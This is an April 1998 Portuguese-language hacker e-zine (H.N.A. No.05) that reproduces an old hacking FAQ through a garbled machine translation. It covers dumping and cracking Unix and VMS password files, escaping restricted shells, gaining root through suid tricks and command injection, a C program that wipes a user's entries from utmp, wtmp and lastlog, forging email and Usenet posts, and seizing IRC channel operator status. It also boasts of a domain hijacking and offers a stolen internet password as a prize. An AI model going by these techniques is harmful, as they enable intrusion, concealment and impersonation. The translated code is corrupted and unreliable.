 `$$a ,$$$'   `"ĂžĂŒ$$' ,$$ĂŒ'  $$a,. `$$a ,$$$'  `ĂŒ$$$' `$$ĂŒĂž'   "ĂŒ$$$sS
"ĂžĂŒ$$$$$$'           `,'         `" $$$$$$$'       `$ ,$'         `
    `ĂŒ$'              $              ` $"           `$'           '   
      ;               ;                !             ;               
      Â­               Â­               ,$a            Â­
     ,$a                              $$$
     $$$             "$"              "$"
     `$'    
 ______    ______      _______        ___              _______
|i     \  |      \    |       )      |   \            (       )
|      |\ |      |\\  |        \\\\\ |   |\\         /    _   i\\\        
|      |\\|      |\\  |         \\\\\|   |\\        /    /\\    \\\
|      ----      |\\  |    |\    \\\\|   |\\       /    /\\_\    \\\
|                |\\  |    | \    \\\|   |\\      /               \\\
|       __       |\\  |    |\ \    \\|   |\\     /      /---\      \\\
|      |\ |      |\\  |    |\\ \    \|   |\\    /      /\\   \      \\\
|      |\ |      |\\  |    |\\\ \        |\\   /      /\\\\\  \      \\\ 
|      |\\|      |\\  |    |\\\\ \       |\\  /       |\\\\\\ |       \\\
|_____i|\\|______|\\  |____)\\\\\\\_____i)\\ (________)\\\\\\\(________)\\   
 \\\\\\\\\\\\\\\\\\\    \\\\\\\\\\\\\\\\\\\\   \\\\\\\\\\\\\\\\\\\\\\\\\\\\
  \\\\\\\\\\\\\\\\\\     \\\\\\\\\\\\\\\\\\\    \\\\\\\\\\\\\\\\\\\\\\\\\\\
					  Ascii Created by -= [HellReĂÂź] =-

@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@
  
                       [HAckEr'Â§ Productions 1998]

@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@
=============================================================================
                        HAcKerÂ§ Productions Â©1998                      
                               Abril 98                              
=============================================================================
                         
=============================================================================

H.N.A - revista mensal ( todos dia 01 na BBS mais prÂąxima).
Pagina oficial: http:\\www.hacknatio.org 
Webmasters - HellReĂÂź - hellred@uol.com.br
             Ăaniel   - wdanielw@rocketmail.com

ICQ - UIN'z = 5818377 HellReĂÂź
              8180900 Ăaniel

14:50 03/04/98 - Edicao - Abril 98


			
*****************************************************************************
***************************** -.- HAckErs -.- *******************************
********************************** No.05 ************************************
*****************************************************************************    
                                                                  
   !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
     !!   ____	 ______	 _______  ______ 			      !! 
     !!  /    \ /  __  \/  	)/  __  \			      !! 	
     !!  |    |	| (  ) |   __|  || (  ) | $$$$$$$$$$$$$$$$$           !!
     !!  |    | | |  | |   |(___)| |  | | $$$$$$$$$$$$$$$$$	      !!
     !!  |    |_|_(__) |   |     | |  |	| $$$$$$$$$$$$$$$$$	      !!	
     !!  |         \   |   \___-)| (__) |   	  $$$$$$$$$	      !!
     !!  \_________/___/________|\______/          $$$$$$$            !!
     !!            				    $$$$$             !!
     !!  A "H.N.A",				     $$$	      !!
     !!	 estara promovendo um concurso de Logos.      $	              !!
     !!	 Oq sĂŁo Logos? SĂŁo akelas figuras de entarda de Home-Page's,  !!
     !!  entaum os amantes de 3DS, 3D Max, 3DStudio, Adobe photo-shop,!!
     !!  Ulead Cool3D, Fractal Desgin.....etc, comecem a fazer o nosso!!
     !!  Logo, Ă© claro que tem que ter o nome nosso nĂ© que Ă© ( H.N.A )!!
     !!  Quem quiser dar uma encrementada nele vale tudo.....a Imagem !!
     !!  tem que ser em  ( Gif ou Jpg ),..nada de BMP..heheh ;-)      !!
     !!              						      !! 
     !!  Agora vc's devem estar-se perguntando: Oq eu ganho com isso? !!   
     !!  Muito simples vc ganhara seu NiCk ou Handle se preferirem em !!
     !!  nosso Zine.....Ex:                                           !!
     !!           __________________________________________          !!
     !!          |seu nick,seu nick,seu nick,seu nick, nick |         !!
     !!          |s                                        s|         !! 
     !!          |e                                        e|         !!
     !!          |u                                        u|         !!
     !!          |                                          |         !!
     !!          |n                                        n|         !!
     !!          |i                                        i|         !!
     !!          |c             Nosso E-Zine               c|         !!
     !!          |k                                        k|         !! 
     !!          |,                                        ,|         !!
     !!          |n                                        n|         !! 
     !!          |i                                        i|         !!
     !!          |c                                        c|         !!
     !!          |seu nick,seu nickseu nick,seu nickseu nick|         !!
     !!          |__________________________________________|         !!
     !!                                                               !!
     !!                                                               !!
     !!  E ai entendeu, Ă© isso mesmo o nosso zine fica no meio como   !!        
     !!  vc esta lendo agora, ou seja ele fica nas bordas do zine.    !!                       
     !!  Ele ficara estampado em nos 2 ultimos zine's do mes.....     !!   
     !!  Meu imagina seu nome ( Nick, Handle ) indo num mailist de    !!
     !!  quase 50.000 pessoas...putz...vc ficara mais famoso que o    !!
     !!  nosso zine....eta sorte hein.....entaum aproveite e naum     !!
     !!  demore....faĂ§a seu logo agora....e nos envie por e-mail.     !! 
     !!                                                               !!
     !!  Nosso email Ă© hellred@uol.com.br                             !!  
     !!  							      !!
     !!  Envie agora e boa sorte........                              !!
     !!								      !!
     !!  Ps: Envie seu E-mail junto,....pois se ganhar como recebera  !!    	
     !!  o premio...heheh.......ahhhh.....e tb o premio inclue 2      !!
     !!  opĂ§Ă”es, 1Â° Uma senha de INTERNET hackeada por mim de 60 hrs, !!
     !!  2Â° Membro de nossa associaĂ§ĂŁo!!                              !!
     !!								      !!
     !!  Enatum boa sorte e envie jĂĄ .....                            !! 
     !!								      !!
     !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

                       


-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-

INDICE:
=========
     
   0- IntroduĂ§ĂŁo
   1. Como eu tenho acesso o arquivo de contra-senha debaixo de Unix?  
   2. Como eu racho contra-senhas de Unix?  
   3. O que estĂĄ sombreando contra-senha?  
   4. Onde eu posso achar o arquivo de contra-senha se Ă© sombreado?  
   5. O que Ă© NIS/yp?  
   6. O que buscam esses carĂĄteres misteriosos a vĂ­rgula em meu arquivo de       passwd?  
   7. Como eu tenho acesso o arquivo de contra-senha debaixo de VMS?  
   8. Como eu racho contra-senhas de VMS?  
   9. Como eu fujo de uma concha restringida?  
   10. Como eu ganho raiz de uma escritura de suid ou programa?  
   11. Como eu apago minha presenĂ§a dos troncos de sistemas?  
   12. Como eu envio fakemail?  
   13. Como eu finjo postos para UseNet?  
   14. Como eu corto ChanOp em IRC?  
   15. Como eu modifico o cliente de IRC para esconder meu real username?

  
     
-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0


0- [iNtRODUCAO]
  
                         We work in the dark
		          We do what we can
		        We give what we have
		      Our doubt is our passion,
		     and our passion is our task
		   The rest is the madness of art.

                          -- Henry James --


  Agora sim, o e-zine esta saindo na data certa, sem atrasos!
  Todo dia 1 do mes o e-zine estara disponivel no site -=H.N.A=- ou 
  em BBS, tambem existem outros sites na internet que distribuem nosso  
  e-zine. E so procurar um pouco!
    
  Bom galera tĂĄ foda editar o zine cada dia pq agente tĂĄ ficando sem matĂ©ria mas nĂłs vamos se esforĂ§ar!! Entaum quanto mais vcs distribuirem o zine mais a gente fica famoso e mais agente faz o zine, pq pensa bem se vcs naum publicarem o nosso zine vcs concordam que ninguem vai se interessar por ele e ai agente naum vai ficar com saco pra fazer um zine pra ninguem enatum vcs tem que ajudar ok :P


      *News* : Caras vcs viram oq fizeram com o dominĂ­o da Axur05? Hahaha     alguĂ©m naum vamos dizer quem mas nĂłs recebemos um mail dizendo  assim :

-------------------------------------------------

Date sent:        Tue, 4 Mar 1998 14:38:49 -0600
To:               hellred@uol.com.br
From:             ?????@?????.com
Subject:          Axur05 LaMMeR'z Hahahahaha

 E ai caras do mau vcs nem acreditam oq eu fiz no dominĂ­o dos caras da Axur..hehe eu entrei nakela merda e mudei o dados pessoais dos cars...hehehe vcs acreditam akeles bostas sĂŁo do Rio Grande do Sul aonde sĂł da Travecos hahaha...bom pra quem quiser conferir de uma olhada na Internic....hehe falow sĂł deixo meus pesames para eles pois eu sou o $$$The Best$$$.

[]'s.......

-------------------------------------------------

    Bom nĂłs da H.N.A nĂo se responsabilizamos por esse delito causado por um rapaz que estĂĄ meio revoltado por causa da "Axur", lembramdo que se os kras da Axur vierem reclamar com agente eu vou dar um pirulito para eles chorarem pois eu naum tenho nada a ver com essa merda nĂłs sĂł publicamos essa matĂ©ria para que os leitores possam saber oq hĂĄ atras do lado engraĂ§ado dos Hacker'z...heheh mas que foi imbecil essse ato foi fala verdade bom enatum atĂ©!!!

Grato

                               [HellReĂÂź]


-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0


01. Como eu tenho acesso o arquivo de contra-senha debaixo de Unix?  
  
Em Unix standard o arquivo de contra-senha Ă© /etc/passwd. Em um sistema de Unix  
com NIS/yp ou contra-senha sombrear, muito dos dados de contra-senha  
possa estar em outro lugar.  
  
  
02. Como eu racho contra-senhas de Unix?  
  
Ao contrĂĄrio de convicĂ§ĂŁo popular, nĂŁo podem ser decifradas contra-senhas de Unix.  Unix  
sĂŁo codificadas contra-senhas com uma uma funĂ§ĂŁo de modo.  O login programam  
codifica o texto vocĂȘ entra Ă  " contra-senha ": incite e compara  
isso codificou fio contra a forma codificada de sua contra-senha.  
  
Contra-senha que racha software usa wordlists.  Cada palavra no wordlist  
Ă© codificado e os resultados sĂŁo comparados Ă  forma codificada do  
contra-senha designada.  
  
O melhor programa rachando para contra-senhas de Unix Ă© atualmente Racha por  
Alec Muffett.  Para PC-DOS, Ă© atualmente o melhor pacote para usar  
CrackerJack.  
  
  
03. O que estĂĄ sombreando contra-senha?  
  
Contra-senha sombrear Ă© um sistema de seguranĂ§a onde a contra-senha codificada  
campo de /etc/passwd Ă© substituĂ­do com uma ficha especial e o  
contra-senha codificada Ă© armazenada em um arquivo separado que nĂŁo Ă© legĂ­vel  
por usuĂĄrios de sistema normais.  
  
Derrotar contra-senha que sombreia em muitos (mas nĂŁo tudo) sistemas, escreva um  
programa que usa chamadas sucessivas para getpwent () obter o  
arquivo de contra-senha.  
  
Exemplo:  
  
#include <pwd.h>  
principal ()  
{  
passwd de struct *p;  
while(p=getpwent ())  
printf (%s:%s:%d:%d:%s:%s:%s\n ", p->pw_name, p->pw_passwd,  
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);  
}  
  
  
04. Onde eu posso achar o arquivo de contra-senha se Ă© sombreado?  
  
Unix Caminho Ficha  
-----------------------------------------------------------------  
AIX 3 /etc/security/passwd!  
       ou carta de /tcb/auth/files/<first #  
                            de username>/<username>  
A/UX 3.0s /tcb/files/auth /? / *  
BSD4.3-Reno /etc/master.passwd *  
ConvexOS 10 /etc/shadpw *  
ConvexOS 11 /etc/shadow *  
DG/UX /etc/tcb/aa/user / *  
EP/IX /etc/shadow x  
HP-UX / .secure/etc/passwd *  
IRIX 5 /etc/shadow x  
Linux 1.1 /etc/shadow *  
OSF/1 /etc/passwd [.dir | .pag] *  
SCO Unix #.2.x carta de /tcb/auth/files/<first *  
                            de username>/<username>  
SunOS4.1+c2 /etc/security/passwd.adjunct ##username  
SunOS 5.0 /etc/shadow  
                      <NIS+ opcional maps/tables/whatever seguro privado>  
V Release de sistema 4.0 /etc/shadow x  
V Release de sistema 4.2 /etc/security / * banco de dados  
Ultrix 4 /etc/auth [.dir | .pag] *  
UNICOS /etc/udb *  
  
  
05. O que Ă© NIS/yp?  
  
NIS (Sistema de InformaĂ§ĂŁo de Cadeia) no nome atual para o que era uma vez  
conhecido como yp (PĂĄginas Amarelas). O propĂłsito para NIS Ă© permitir muitos  
mĂĄquinas em uma cadeia para compartilhar informaĂ§ĂŁo de configuraĂ§ĂŁo, incluindo,  
dados de contra-senha.  NIS nĂŁo Ă© projetado para promover seguranĂ§a de sistema.  Se  
seu de sistema usa NIS vocĂȘ terĂĄ um arquivo de /etc/passwd muito pequeno que  
inclui uma linha que se parece:  
  
+::0:0:::  
  
Ver o real uso de arquivo de contra-senha este passwd " de ypcat de comando "  
  
  
06. O que buscam esses carĂĄter misteriosos a vĂ­rgula em meu arquivo de passwd?  
  
Os carĂĄter sĂŁo contra-senha que envelhece dados.  Contra-senha que envelhece forĂ§as o  
usuĂĄrio para mudar contra-senhas depois de um Administrador De sistema especificou perĂ­odo  
de tempo.  Contra-senha envelhecendo tambĂ©m podem forĂ§ar um usuĂĄrio a manter uma contra-senha para  
um certo nĂșmero de semanas antes de mudar isto.  
  
]  
] Entrada de amostra de /etc/passwd com contra-senha envelhecer instalou:  
]  
] Will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash  
]  
  
Note a vĂ­rgula no campo de contra-senha codificado.  Os carĂĄter depois de  
a vĂ­rgula Ă© usada pela contra-senha que envelhece mecanismo.  
  
]  
] Contra-senha que envelhece carĂĄter de sobre exemplo:  
]  
] M.z8  
]  
  
Os quatro carĂĄter sĂŁo interpretados como segue:  
  
  1: NĂșmero de mĂĄximo de semanas que uma contra-senha pode ser usada sem mudar.  
  2: NĂșmero mĂ­nimo de semanas que uma contra-senha deve ser usada antes de mudar.  
3&4: Ășltima contra-senha de tempo foi mudada, em nĂșmero de semanas desde 1970.  
  
Deveriam ser notados trĂȘs casos especiais:  
  
Se os primeiro e segundos carĂĄter sĂŁo fixados '.. ' o usuĂĄrio serĂĄ  
forĂ§ado a mudar passwd de his/her o da prĂłxima vez he/she anota em.  O  
programa de passwd removerĂĄ o passwd que envelhece carĂĄter entĂŁo, e o  
usuĂĄrio nĂŁo serĂĄ sujeitado a contra-senha que envelhece exigĂȘncias novamente.  
  
Se o terĂ§o e quartos carĂĄter sĂŁo fixados '.. ' o usuĂĄrio serĂĄ  
forĂ§ado a mudar passwd de his/her o da prĂłxima vez he/she anota em. Contra-senha  
envelhecendo acontecerĂŁo entĂŁo como definiu pelos primeiro e segundos carĂĄter.  
  
Se o primeiro carĂĄter (MAX) Ă© menos que o segundo carĂĄter (MIN),  
o usuĂĄrio nĂŁo Ă© permitido mudar contra-senha de his/her.  SĂł lata de raiz  
mudanĂ§a que contra-senha de usuĂĄrios.  
  
TambĂ©m deveria ser notado que o comando de su nĂŁo confere a contra-senha  
envelhecendo dados.  Uma conta com uma contra-senha expirada pode ser su para  
sem ser forĂ§ado a mudar a contra-senha.  
  
  
                        Contra-senha que Envelhece CĂłdigos  
+------------------------------------------------------------------------+  
| |  
| CarĂĄter:  .  / 0 1 2 3 4 5 6 7 8 9 um B C D E F G H |  
| NĂșmero:  0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |  
| |  
| CarĂĄter:  Eu J K L M N O P Q R S T U V W X Y Z um b |  
| NĂșmero: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |  
| |  
| CarĂĄter:  c d e f g h i j k l m n o p q r s t u v |  
| NĂșmero: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |  
| |  
| CarĂĄter:  w x y z |  
| NĂșmero: 60 61 62 63 |  
| |  
+------------------------------------------------------------------------+  
  
  
07. Como eu tenho acesso o arquivo de contra-senha debaixo de VMS?  
  
Debaixo de VMS, o arquivo de contra-senha Ă© SYS$SYSTEM:SYSUAF.DAT. PorĂ©m,  
Unix distinto, a maioria dos usuĂĄrios nĂŁo tem acesso para ler o arquivo de contra-senha.  
  
  
08. Como eu racho contra-senhas de VMS?  
  
Escreva um programa que usa o SYS$GETUAF funciona para comparar o  
resultados de palavras codificadas contra os dados codificados em SYSUAF.DAT.  
  
SĂŁo conhecidos dois tais programas para existir, CHECK_PASSWORD e  
GUESS_PASSWORD.  
  
  
09. Como eu fujo de uma concha restringida?  
  
Em conchas restringidas implementadas mal vocĂȘ pode quebrar fora do  
ambiente restringido correndo um programa que caracteriza uma concha  
funĂ§ĂŁo.  Um exemplo bom Ă© vi.  Corra vi e use este comando:  
  
Shell=/bin/sh de :set  
  
entĂŁo concha que usa este comando:  
  
:shell  
  
  
10. Como eu ganho raiz de uma escritura de suid ou programa?  
  
1. mudanĂ§a IFS.  
  
Se o programa chama qualquer outro programa que usa o sistema () funĂ§ĂŁo  
chame, vocĂȘ pode poder enganar isto mudando IFS.  IFS Ă© o Interno  
Separador de campo que a concha usa para delimitar argumentos.  
  
Se o programa contĂ©m uma linha que se parece:  
  
sistema (/bin/date ")  
  
e vocĂȘ muda IFS para ' / ' a concha os vai interprete o  
linha procedendo como:  
  
data de caixa  
  
Agora, se vocĂȘ tem um programa de seu prĂłprio no caminho chamada " caixa " o  
programa de suid correrĂĄ seu programa em vez de /bin/date.  
  
Mudar IFS, use este comando:  
  
IFS = ' / ' ;export IFS #Concha de Bourne  
setenv IFS ' / ' #Concha de C  
exporte IFS = ' / ' #Concha de Korn  
  
  
2. vĂ­nculo a escritura para -i  
  
Crie um vĂ­nculo simbĂłlico nomeado " -i " para o programa.  Correndo " -i "  
cause a concha de intĂ©rprete (/bin/sh) comeĂ§ar para cima em interativo  
modo.  Isto sĂł trabalha em suid descasque escrituras.  
  
Exemplo:  
  
% ln suid.sh -i  
% -i  
#  
  
  
3. explore uma condiĂ§ĂŁo de raĂ§a  
  
Substitua um vĂ­nculo simbĂłlico ao programa com outro programa enquanto o  
nĂșcleo estĂĄ carregando /bin/sh.  
  
Exemplo:  
  
-19 suidprog agradĂĄvel; ln -s evilprog suidroot  
  
  
4. envia ruim introduza ao programa.  
  
Invoque o nome do programa e um comando separado no mesmo  
linha de comando.  
  
Exemplo:  
  
suidprog; id  
  
  
11. Como eu apago minha presenĂ§a dos troncos de sistemas?  
  
Edite /etc/utmp, /usr/adm/wtmp e /usr/adm/lastlog. Estes nĂŁo sĂŁo nenhum texto  
arquivos que podem ser editados Ă  mĂŁo com vi, vocĂȘ tem que usar um programa  
especificamente escrito para este propĂłsito.  
  
Exemplo:  
  
#include <sys/types.h>  
#include <stdio.h>  
#include <unistd.h>  
#include <sys/file.h>  
#include <fcntl.h>  
#include <utmp.h>  
#include <pwd.h>  
#include <lastlog.h>  
#define WTMP_NAME " /usr/adm/wtmp "  
#define UTMP_NAME " /etc/utmp "  
#define LASTLOG_NAME " /usr/adm/lastlog "  
   
int f;  
   
kill_utmp(who nulo)  
chamusque *who;  
{  
    utmp_ent de utmp de struct;  
   
  se ((f=open(UTMP_NAME,O_RDWR)) >=0) {  
     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0)  
       se (!strncmp(utmp_ent.ut_name,who,strlen(who))) {  
                 bzero((char *) &utmp_ent,sizeof (utmp_ent));  
                 lseek (f, - (sizeof (utmp_ent)), SEEK_CUR);  
                 escreva (f, &utmp_ent, sizeof (utmp_ent));  
            }  
     close(f);  
  }  
}  
   
kill_wtmp(who nulo)  
chamusque *who;  
{  
    utmp_ent de utmp de struct;  
    pos longo;  
   
    pos = 1L;  
    se ((f=open(WTMP_NAME,O_RDWR)) >=0) {  
   
     while(pos != -1L) {  
        lseek(f,-(long) ((utmp de sizeof(struct)) * pos),L_XTND);  
        se (leia (f, &utmp_ent, sizeof (utmp de struct)) <0) {  
          pos = -1L;  
        } outro {  
          se (!strncmp(utmp_ent.ut_name,who,strlen(who))) {  
               bzero((char *) utmp de &utmp_ent,sizeof(struct));  
               lseek(f, - ((utmp de sizeof(struct)) * pos),L_XTND);  
               escreva (f, &utmp_ent, sizeof (utmp_ent));  
               pos = -1L;  
          } outro pos + = 1L;  
        }  
     }  
     close(f);  
  }  
}  
   
kill_lastlog(who nulo)  
chamusque *who;  
{  
    passwd de struct *pwd;  
    newll de lastlog de struct;  
   
     se ((pwd=getpwnam(who)) !=NULL) {  
   
        se ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {  
            lseek(f, (long)pwd->pw_uid * sizeof (lastlog de struct), 0);  
            bzero((char *) &newll,sizeof (newll));  
            write(f, (chamusque *) &newll, sizeof (newll));  
            close(f);  
        }  
   
    } outro printf (" %s:? \n",who);  
}  
   
main(argc,argv)  
argc de int;  
chamusque *argv [];  
{  
    se (argc==2) {  
        kill_lastlog(argv[1]);  
        kill_wtmp(argv[1]);  
        kill_utmp(argv[1]);  
        printf (Zap2!\n ");  
    } outro  
    printf (" Erro. \n ");  
}  
  
  
12. Como eu envio fakemail?  
  
Telnet para aportar 25 da mĂĄquina vocĂȘ quer o correio para aparecer  
origine de.  Entre em sua mensagem como neste exemplo:  
  
 HELO bellcore.com  
 REMETA FROM:Voyager@bellcore.com  
 RCPT TO:president@whitehouse.gov  
 DADOS  
  
	Por favor descontinue sua iniciativa de Cortador tola.  
 .  
 DEIXE  
  
Em sistemas que tĂȘm RFC 931 implementados, spoofing seu " CORREIO DE ":  
linha nĂŁo trabalharĂĄ.  Teste se enviando primeiro fakemail.  
  
Para mais informationm RFC leu 822 " PadrĂŁo para o formato de ARPA  
Internet texto mensagens ".  
  
  
13. Como eu finjo postos para UseNet?  
  
Use inews para postar.  DĂȘ para inews as linhas seguintes:  
  
 De:  
 Newsgroups:  
 Assunto:  
 Mensagem-ID:  
 Data:  
 OrganizaĂ§ĂŁo:  
  
Para um newsgroup moderado, inews requererĂŁo tambĂ©m esta linha:  
  
 Aprovado:  
  
EntĂŁo some seu posto e termine com <Controlar-D>.  
  
Exemplo:  
  
 De: Eric S. Real  
 Newsgroups: alt.hackers  
 Assunto: Grupo patĂ©tico de perdedores de wannabe  
 Mensagem-ID: <esr.123@locke.ccil.org>  
 Data: Fri, 13 1994 12:15:03 de agosto,  
 OrganizaĂ§ĂŁo: Maioria moral  
  
 Um grupo patĂ©tico de perdedores de wannabe Ă© o que a maioria de vocĂȘ Ă©, sem  
 corrija para roubar o tĂ­tulo honrado de `Hacker ' inchar seu tolo  
 egos adolescentes. Ă enchido, se perca, e vai encarcerar.  
  
                                        Eric S. Real <esr@locke.ccil.org>  
  
  
 ^D  
  
Note aquele muitos sistemas juntarĂŁo um Originador: enfileire a sua mensagem  
header, revelando a conta da qual a mensagem era efetivamente,  
postado.  
  
  
14. Como eu corto ChanOp em IRC?  
  
Ache um servidor que Ă© fendido do resto de IRC e cria seu prĂłprio  
encane usando o nome do canal lĂĄ vocĂȘ quer ChanOp em.  Quando  
aquele servidor reconecta Ă  rede, vocĂȘ terĂĄ ChanOp na realidade  
canal.  Se vocĂȘ tem ServerOp em um servidor, vocĂȘ pode causar isto para dividir  
de propĂłsito.  
  
  
15. Como eu modifico o cliente de IRC para esconder meu real username?  
  
Obtenha o cliente de IRC de cs.bu.edu /irc/clients. Olhar Ă  fonte  
cĂłdigo arquiva irc.c e ctcp.c. O cĂłdigo para o que vocĂȘ estĂĄ olhando Ă© razoavelmente  
fĂĄcil manchar.  Mude. Mude o username codificam em irc.c e o  
cĂłdigo de informaĂ§ĂŁo de ctcp em ctcp.c. Compile e corra seu cliente.  
  
Aqui estĂĄ o diffs de uma amostra corte do cliente de IRC.  Seu cliente  
cĂłdigo variarĂĄ e dependerĂĄ ligeiramente de que IRC cliente versĂŁo vocĂȘ Ă©  
correndo.  
  
* * * ctcp.c.old Wed 10 10:08:05 1993 de fevereiro  
--- ctcp.c Fri 12 04:33:55 1993 de fevereiro  
* * * * * * * * * * * * * * *  
* * * 331,337 * * * *  
	passwd de struct *pwd;  
	diff longo;  
	uid de int;  
!       chamusque c;  
    
	/ *  
	 * sojge reclamaram aquele ircII diz ' 1 segundos inativos  
--- 331,337----  
	passwd de struct *pwd;  
	diff longo;  
	uid de int;  
!       chamusque c, *fing,;  
    
	/ *  
	 * sojge reclamaram aquele ircII diz ' 1 segundos inativos  
* * * * * * * * * * * * * * *  
* * * 348,354 * * * *  
	se (uid != DAEMON_UID)  
	{  
  #endif / * DAEMON_UID * /         
!               se (pwd = getpwuid(uid))  
		{  
			chamusque *tmp;  
    
--- 348,356----  
	se (uid != DAEMON_UID)  
	{  
  #endif / * DAEMON_UID * /         
!               se (fing = getenv (IRCFINGER "))  
!                       send_ctcp_reply(from, ctcp->name, fing, diff, c);  
!               outro se (pwd = getpwuid(uid))  
		{  
			chamusque *tmp;  
    
* * * irc.c.old Wed 10 06:33:11 1993 de fevereiro  
--- irc.c Fri 12 04:02:11 1993 de fevereiro  
* * * * * * * * * * * * * * *  
* * * 510,516 * * * *  
		malloc_strcpy(&my_path," /");  
	se (*realname == null(char))  
		strmcpy(realname, " *Unknown *", REALNAME_LEN);  
!       se (*username == null(char))  
	{  
		se (ptr = getenv (o USUĂRIO "))  
			strmcpy(username, ptr, NAME_LEN);  
--- 510,518----  
		malloc_strcpy(&my_path," /");  
	se (*realname == null(char))  
		strmcpy(realname, " *Unknown *", REALNAME_LEN);  
!       se (ptr = getenv (IRCUSER "))  
!               strmcpy(username, ptr, NAME_LEN);  
!       outro se (*username == null(char))  
	{  
		se (ptr = getenv (o USUĂRIO "))  
			strmcpy(username, ptr, NAME_LEN);  


-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-
 

|Editores|

HellRedÂź
Ăaniel


=======================================================================
                       Hackers Productions 1998                      
                                                            
=======================================================================
                               Abril 98
=======================================================================
                 
=======================================================================
